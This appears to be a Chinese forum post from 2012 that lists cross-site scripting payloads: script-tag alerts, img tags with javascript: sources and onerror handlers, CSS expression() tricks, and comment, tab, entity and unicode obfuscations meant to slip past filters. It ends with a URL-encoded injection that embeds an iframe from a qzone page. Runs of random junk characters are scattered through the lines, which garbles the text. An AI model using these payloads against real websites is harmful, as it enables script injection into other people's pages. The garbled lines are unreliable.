<script>alert("跨站")</script> (最常用)
6 ^1 E& Y9 b6 w ?2 D<img scr=javascript:alert("跨站")></img>
7 n* Y \ ?' I) q<img scr="javascript: alert(/跨站/)></img>
0 n2 J# R3 g0 u2 f" i2 [1 m<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
8 I5 s9 `7 Y# ?# i7 X1 j<img scr="#" onerror=alert(/跨站/)></img>9 o) I3 H. Y5 M0 w6 `' l
<img scr="#" style="xss:expression(alert(/xss/));"></img>
# ~' e s/ h; J' u, m<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)! a3 r. J' ~3 y- e" d7 u! O4 [" g
<img src=vbscript:msgbox ("xss")></img>2 ]0 I' f2 j5 H& o9 p5 W
<style> input {left:expression (alert('xss'))}</style>
- A0 v: @* z0 [6 n. G# x0 n$ |<div style={left:expression (alert('xss'))}></div>
2 i7 ]4 x. ?+ V- \9 g% u/ ?, g<div style={left:exp/* */ression (alert('xss'))}></div>
# o2 R" R2 a, U: K0 _<div style={left:\0065\0078ression (alert('xss'))}></div>9 ~& |- l$ `& L6 u# B
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>1 v' n$ z9 f+ f9 W' s1 A! h: j
unicode <div style="{left:expRessioN (alert('xss'))}">
, T- R4 D3 u7 L7 ] t) Q
( X" H9 P& x5 ^ ], C4 Z5 S; l/ K+ y"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["- o1 y: c" m0 Q
|
发表于 2012-9-13 17:15:04
收藏
支持
反对